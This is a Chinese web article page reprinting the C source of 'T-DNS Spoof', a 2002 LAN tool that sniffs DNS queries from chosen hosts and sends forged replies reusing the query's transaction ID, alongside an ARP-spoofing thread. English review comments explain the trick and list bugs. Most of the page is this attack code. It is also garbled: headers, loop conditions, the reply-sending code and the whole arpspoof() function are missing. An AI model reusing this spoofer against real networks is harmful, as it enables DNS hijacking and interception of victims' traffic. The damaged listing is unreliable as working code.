Windows下DNS ID欺骗的原理与实现 二


Windows下DNS ID欺骗的原理与实现 二

日期:2007-01-05
  五、附：源代码（注意：以下清单在网页转换时受损——尖括号之间的内容被当作 HTML 标签删除，因此头文件名、若干循环/判断条件、sniff() 构造 IP 头之后的部分、整个 arpspoof() 函数以及 getmac() 的开头均已丢失，不能直接编译，需对照原始发布件核对。）

#include

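#include
#include
/*
 * T-DNS Spoof (TOo2y, 2002): a LAN DNS spoofer.  A capture thread (sniff)
 * watches for DNS queries sent by two chosen hosts and answers them with a
 * forged reply that reuses the query's transaction ID; a second thread
 * (arpspoof, not present in this copy of the listing) is started by main().
 *
 * NOTE(review): the #include lines above lost their header names when the
 * page that carried this listing stripped everything between '<' and '>'
 * as HTML markup (the same damage truncates conditions further down).
 * Judging by the APIs used (PacketOpenAdapter/PacketSetHwFilter and
 * struct bpf_hdr, SendARP/IPAddr, htons/inet_addr, printf/malloc/memcpy)
 * the original appears to have pulled in the WinPcap packet-driver header,
 * the IP Helper header, Winsock and the C runtime; confirm against the
 * original release before building.
 */

/* Ethernet type and ARP field values as they appear on the wire (host order
 * here; compare against htons() of these when reading from a frame). */
#define ETH_IP                       0x0800
#define ETH_ARP                      0x0806
#define ARP_REQUEST                  0x0001
#define ARP_REPLY                    0x0002
#define ARP_HARDWARE                 0x0001
#define MAX_NUM_ADAPTER              10
#define NDIS_PACKET_TYPE_PROMISCUOUS 0x0020

/* Every struct below is overlaid on raw frame bytes, so no padding allowed. */
#pragma pack(push,1)

/* Ethernet II header. */
typedef struct ethdr {
    unsigned char  eh_dst[6];
    unsigned char  eh_src[6];
    unsigned short eh_type;      /* ETH_IP / ETH_ARP, network order */
} ETHDR, *PETHDR;

/* ARP packet for Ethernet/IPv4. */
typedef struct arphdr {
    unsigned short arp_hdr;      /* hardware type (ARP_HARDWARE) */
    unsigned short arp_pro;      /* protocol type (ETH_IP) */
    unsigned char  arp_hln;      /* hardware address length */
    unsigned char  arp_pln;      /* protocol address length */
    unsigned short arp_opt;      /* ARP_REQUEST / ARP_REPLY */
    unsigned char  arp_sha[6];   /* sender MAC */
    /* Four bytes on the wire.  Was `unsigned long`, which is 4 bytes under
     * MSVC but 8 under LP64 compilers and would silently break this layout;
     * `unsigned int` matches the IPHDR address fields below. */
    unsigned int   arp_spa;      /* sender IPv4 address */
    unsigned char  arp_tha[6];   /* target MAC */
    unsigned int   arp_tpa;      /* target IPv4 address */
} ARPHDR, *PARPHDR;

/* IPv4 header without options. */
typedef struct iphdr {
    unsigned char  h_lenver;     /* version (high nibble) and header length in words */
    unsigned char  tos;
    unsigned short total_len;
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char  ttl;
    unsigned char  protocol;     /* 17 = UDP, the only value this tool looks at */
    unsigned short checksum;
    unsigned int   sourceip;
    unsigned int   destip;
} IPHDR, *PIPHDR;

/* Pseudo header prefixed to the UDP datagram when its checksum is computed. */
typedef struct psd {
    unsigned int   saddr;
    unsigned int   daddr;
    char           mbz;          /* must be zero */
    char           ptcl;         /* protocol (17) */
    unsigned short udpl;         /* UDP length */
} PSD, *PPSD;

/* UDP header.  The misspelt `souceport` is referenced throughout sniff(); keep it. */
typedef struct udphdr {
    unsigned short souceport;
    unsigned short destport;
    unsigned short length;
    unsigned short checksum;
} UDPHDR, *PUDPHDR;

/* DNS message header (RFC 1035 section 4.1.1); all fields network order. */
typedef struct dns {
    unsigned short id;           /* transaction ID the forged reply copies */
    unsigned short flags;
    unsigned short quests;       /* QDCOUNT */
    unsigned short answers;      /* ANCOUNT */
    unsigned short author;       /* NSCOUNT */
    unsigned short addition;     /* ARCOUNT */
} DNS, *PDNS;

/* Fixed tail of a question entry; the variable-length QNAME precedes it. */
typedef struct query {
    unsigned short type;
    unsigned short classes;
} QUERY, *PQUERY;

/* One resource record as this tool emits it: a two-byte compression pointer
 * for the name and a fixed four-byte RDATA (an IPv4 address). */
typedef struct response {
    unsigned short name;         /* 0xC00C = pointer to the question name */
    unsigned short type;
    unsigned short classes;
    unsigned int   ttl;
    unsigned short length;       /* always 4 */
    unsigned int   addr;
} RESPONSE, *PRESPONSE;
#pragma pack(pop)

/*
 * RFC 1071 one's-complement checksum over `size` bytes at `buffer`, used for
 * the IP and UDP headers of the forged reply.  The 16-bit words are summed
 * exactly as stored, so the complemented result can be written straight
 * into the packet without htons().
 *
 * A trailing odd byte is summed as the first byte of a zero-padded word.
 * The original read a whole 16-bit word at that point, which both read one
 * byte past the end of `buffer` and folded whatever followed it into the
 * sum unless the caller had zeroed it.
 */
unsigned short checksum(const unsigned short *buffer, int size)
{
    unsigned long sum = 0;

    while (size > 1) {
        sum += *buffer++;
        size -= (int)sizeof(unsigned short);
    }
    if (size > 0) {
        unsigned short last = 0;
        /* place the byte where a zero-padded word would hold it; byte-order neutral */
        *(unsigned char *)&last = *(const unsigned char *)buffer;
        sum += last;
    }
    /* fold the carries back into the low 16 bits (twice: the first fold can carry) */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short)(~sum);
}

/* Shared state.  firstip/secondip/virtualip, myip and the fmac/smac tables
 * are filled in main()/getmac() before the sniff and arpspoof threads are
 * created; lppacketr is allocated by sniff(), lppackets by main(). */
LPADAPTER lpadapter = 0;
LPPACKET  lppacketr, lppackets;
IPAddr    myip, firstip, secondip, virtualip;
UCHAR     mmac[6] = {0}, fmac[6] = {0}, smac[6] = {0};
char      adapterlist[MAX_NUM_ADAPTER][1024];

/* Banner.  (The "_blank>" fragment in the homepage line is HTML residue from
 * the page this listing was copied from, not part of the original program.) */
void start()
{
    printf("===[ T-DNS Spoof, by TOo2y       ]===\n");
    printf("===[ E-mail: [email protected] ]===\n");
    printf("===[ Homepage: _blank>www.safechina.net ]===\n");
    printf("===[ Date: 10-15-2002            ]===\n\n");
    return;
}

/* Command-line synopsis: the two hosts whose queries are answered and the
 * address every forged answer points at. */
void usage()
{
    printf("Usage:  T-DNS  Firstip  Secondip  Virtualip\n");
    return;
}

/*
 * Capture thread.  Puts the adapter into promiscuous mode, hands the driver
 * a read buffer and loops over received frames; the per-frame parsing and
 * the reply construction follow below this function's prologue.
 * `no` is unused.  Returns -1 (as a DWORD, 0xFFFFFFFF) when the capture
 * buffers cannot be set up, 0 is never returned — the loop only ends when
 * PacketReceivePacket() fails.
 */
DWORD WINAPI sniff(LPVOID no)
{
    char     *buf;                 /* start of the current capture buffer */
    char     *pchar;               /* start of the frame being parsed inside buf */
    char     temp[1024];
    char     sendbuf[1024];        /* zeroed before each reply is built */
    char     recvbuf[1024*250];    /* user-side capture buffer given to the driver */
    struct   bpf_hdr     *hdr;     /* per-frame capture header */
    unsigned char        *dname;   /* copy of the question name, malloc'd per query */
    unsigned long        ulbytesreceived,off,ulen;
    ETHDR    ethr,eths;            /* ...r: headers parsed from the query, ...s: the reply */
    IPHDR    ipr,ips;
    PSD      psds;                 /* presumably the pseudo header for udps.checksum */
    UDPHDR   udpr,udps;
    DNS      dnsr,dnss;
    QUERY    queryr,querys;
    RESPONSE responses;

    printf("\nI am sniffing...\n");

    if (PacketSetHwFilter(lpadapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) {
        /* non-fatal in the original; the capture then sees only frames the
         * adapter would deliver anyway */
        printf("Warning: Unable to set the adapter to promiscuous mode!\n");
    }
    if (PacketSetBuff(lpadapter, 500*1024) == FALSE) {
        printf("PacketSetBuff Error: %d\n", GetLastError());
        return -1;
    }
    if (PacketSetReadTimeout(lpadapter, 1) == FALSE) {
        printf("Warning: Unable to set the timeout!\n");
    }
    if ((lppacketr = PacketAllocatePacket()) == FALSE) {
        printf("PacketAllocatePacket Receive Error: %d\n", GetLastError());
        return -1;
    }
    PacketInitPacket(lppacketr, (char *)recvbuf, sizeof(recvbuf));

    while (1) {
        if (PacketReceivePacket(lpadapter, lppacketr, TRUE) == FALSE) {
            break;
        }
        /* one read may return several frames back to back; walk them by offset */
        ulbytesreceived = lppacketr->ulBytesReceived;
        buf = (char *)lppacketr->Buffer;
        off = 0;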
    /*
     * NOTE(review): this line was damaged in extraction — the loop bound after
     * `while(off` and the `hdr=(struct bpf_hdr *)(buf+off); off+=` that must
     * have preceded `bh_hdrlen` are gone, so it cannot compile as printed.
     * What survives shows the per-frame handling: every IP frame from firstip
     * or secondip with protocol 17 (UDP) and destination port 53 is parsed as
     * a DNS query and a reply header is assembled whose transaction ID
     * (dnss.id = dnsr.id) and swapped ports are copied from the query — that
     * copy is the whole "DNS ID spoofing" trick: a resolver accepts the first
     * answer whose ID (and ports/question) match its outstanding query.
     * Defects a reviewer should not carry over:
     *  - ulen = ntohs(udpr.length) - sizeof(UDPHDR) - sizeof(DNS) - sizeof(QUERY)
     *    is unsigned; any UDP length below 24 wraps it to a huge value, and
     *    the malloc() result is neither checked nor ever freed (one leak per
     *    UDP packet, not just per DNS query).
     *  - nothing is compared against hdr->bh_caplen before the ETH/IP/UDP/DNS
     *    headers and `ulen` bytes of name are read, so a short or truncated
     *    capture reads past the frame.
     *  - responses.type is copied from the query but RDATA is always 4 bytes
     *    (length = htons(4), addr = virtualip), i.e. only an A query yields a
     *    well-formed answer.  responses.name = htons(0xC00C) is a compression
     *    pointer to the question name at offset 12 of the DNS message; flags
     *    0x8180 = standard response, RD and RA set, RCODE 0.
     *  - responses.ttl = 0xFFFFFFFF reads the same in either byte order; many
     *    resolvers clamp such a TTL (RFC 2181 treats a TTL with the top bit
     *    set as 0), so the "cache it forever" effect is not guaranteed.
     */
    while(offbh_hdrlen;               pchar=(char *)(buf+off);            off=Packet_WORDALIGN(off+hdr->bh_caplen);            ethr=*(ETHDR *)pchar;             if(ethr.eh_type==htons(ETH_IP))        {                        ipr=*(IPHDR *)(pchar+sizeof(ETHDR));                if(ipr.protocol!=17)            {                     continue;            }            if((ipr.sourceip!=secondip) && (ipr.sourceip!=firstip))            {                continue;            }                udpr=*(UDPHDR *)(pchar+sizeof(ETHDR)+sizeof(IPHDR));            ulen=ntohs(udpr.length)-sizeof(UDPHDR)-sizeof(DNS)-sizeof(QUERY);            dname=(unsigned char *)malloc(ulen*sizeof(unsigned char));                if(udpr.destport==htons(53))                                    {                            printf("Get a DNS Packet...\t");                          memset(sendbuf,0,sizeof(sendbuf));                    memcpy(&dnsr,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR),sizeof(DNS));                    memcpy(dname,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS),ulen);                    memcpy(&queryr.type,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen,2);                     memcpy(&queryr.classes,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+2,2);                    responses.name=htons(0xC00C);                      responses.type=queryr.type;                    responses.classes=queryr.classes;                     responses.ttl=0xFFFFFFFF;                    responses.length=htons(4);                    responses.addr=virtualip;                     querys.classes=queryr.classes;                           querys.type=queryr.type;                dnss.id=dnsr.id;                    dnss.flags=htons(0x8180);                          dnss.quests=htons(1);                dnss.answers=htons(1);                    dnss.author=0;                    dnss.addition=0;                    udps.souceport=udpr.destport;                    
/*
 * NOTE(review): the largest gap is here — the text jumps from
 * `ips.h_lenver=(4` (start of the reply's IP header) straight into the tail
 * of getmac() at `IpAddressList)`.  The rest of sniff() (IP/UDP checksums and
 * the PacketSendPacket of the reply), the whole arpspoof() thread that
 * main() starts, and the head of getmac() are missing from this page.
 * Of what remains:
 *  - getmac() reads this host's address into myip (apparently from a
 *    GetAdaptersInfo-style list — the call itself is lost), then resolves
 *    firstip and secondip with SendARP() (pulmac pre-filled with 0xff) into
 *    fmac/smac; an ARP failure returns FALSE and main() exits.
 *  - main() takes exactly three dotted-quad arguments (firstip secondip
 *    virtualip) through inet_addr(), which returns INADDR_NONE for garbage
 *    without this code noticing.
 *  - the adapter-name loop reads *(name1-1) on its first iteration, i.e.
 *    one byte before `adaptername`; the operator between its two conditions
 *    is missing; and it copies 2*(name1-name2) bytes into adapterlist[i]
 *    with no bound on i (MAX_NUM_ADAPTER rows) or on the 1024-byte row.
 *    `for(i=0;i` and `open>=1 && open` lost their upper bounds in extraction,
 *    and scanf("%d",&open) is unchecked.
 *  - system("cls.exe") spawns a shell just to clear the screen; avoid
 *    system() in a tool that needs driver-level privileges to run at all.
 */
udps.destport=udpr.souceport;                udps.length=htons(sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));                    udps.checksum=0;                                              ips.h_lenver=(4IpAddressList);    myip=inet_addr(paddrstr->IpAddress.String);        ullen=6;    memset(pulmac,0xff,sizeof(pulmac));        destip=firstip;    if((hr=SendARP(destip,0,pulmac,&ullen))!=NO_ERROR)    {        printf("SendARP firstip Error: %d\n",GetLastError());        return FALSE;    }    memcpy(fmac,pulmac,6);    memset(pulmac,0xff,sizeof(pulmac));    destip=secondip;    if((hr=SendARP(destip,0,pulmac,&ullen))!=NO_ERROR)    {        printf("SendARP secondip Error: %d\n",GetLastError());        return FALSE;    }    memcpy(smac,pulmac,6);    return TRUE;}int main(int argc,char *argv[]){    HANDLE   thread[2];    WCHAR    adaptername[8192];    WCHAR    *name1,*name2;    ULONG    adapterlength;    DWORD    threadsid,threadrid;    int      adapternum=0,open,i;    system("cls.exe");    start();    if(argc!=4)    {        usage();        return -1;    }    firstip=inet_addr(argv[1]);    secondip=inet_addr(argv[2]);    virtualip=inet_addr(argv[3]);    if(getmac()==FALSE)    {        return -1;    }    adapterlength=sizeof(adaptername);    if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE)    {        printf("PacketGetAdapterNames Error: %d\n",GetLastError());        return -1;    }    name1=adaptername;    name2=adaptername;    i=0;    while((*name1!='\0') (*(name1-1)!='\0'))    {        if(*name1=='\0')        {            memcpy(adapterlist[i],name2,2*(name1-name2));            name2=name1+1;            i++;        }        name1++;    }    adapternum=i;    printf("Adapters Installed: \n");    for(i=0;i    {        wprintf(L"%d - %s\n",i+1,adapterlist[i]);      }    do    {        printf("\nSelect the number of the adapter to open: ");        scanf("%d",&open);        if(open>=1 && openhFile==INVALID_HANDLE_VALUE))    {        
/*
 * NOTE(review): tail of main().  Both threads are started and then waited on
 * with WaitForMultipleObjects(2, thread, FALSE, INFINITE) — bWaitAll is
 * FALSE, so the wait returns as soon as EITHER thread exits and the packet
 * and adapter handles below are released while the other thread may still
 * be using them.  On a CreateThread failure for arpspoof the already-running
 * sniff thread and its handle are simply abandoned.
 */
printf("PacketOpenAdapter Error: %d\n",GetLastError());        return -1;    }    if((lppackets=PacketAllocatePacket())==FALSE)    {        printf("PacketAllocatePacket Send Error: %d\n",GetLastError());        return -1;    }    thread[0]=CreateThread(NULL,0,sniff,NULL,0,&threadrid);    if(thread[0]==NULL)    {        printf("CreateThread for sniffer Error: %d\n",GetLastError());        return -1;    }    thread[1]=CreateThread(NULL,0,arpspoof,NULL,0,&threadsid);    if(thread[1]==NULL)    {        printf("CreateThread for arpspoof Error: %d\n",GetLastError());        return -1;    }    WaitForMultipleObjects(2,thread,FALSE,INFINITE);    CloseHandle(thread[0]);    CloseHandle(thread[1]);    PacketFreePacket(lppackets);    PacketFreePacket(lppacketr);    PacketCloseAdapter(lpadapter);    return 0;}

(出处:http://www.sheup.com)


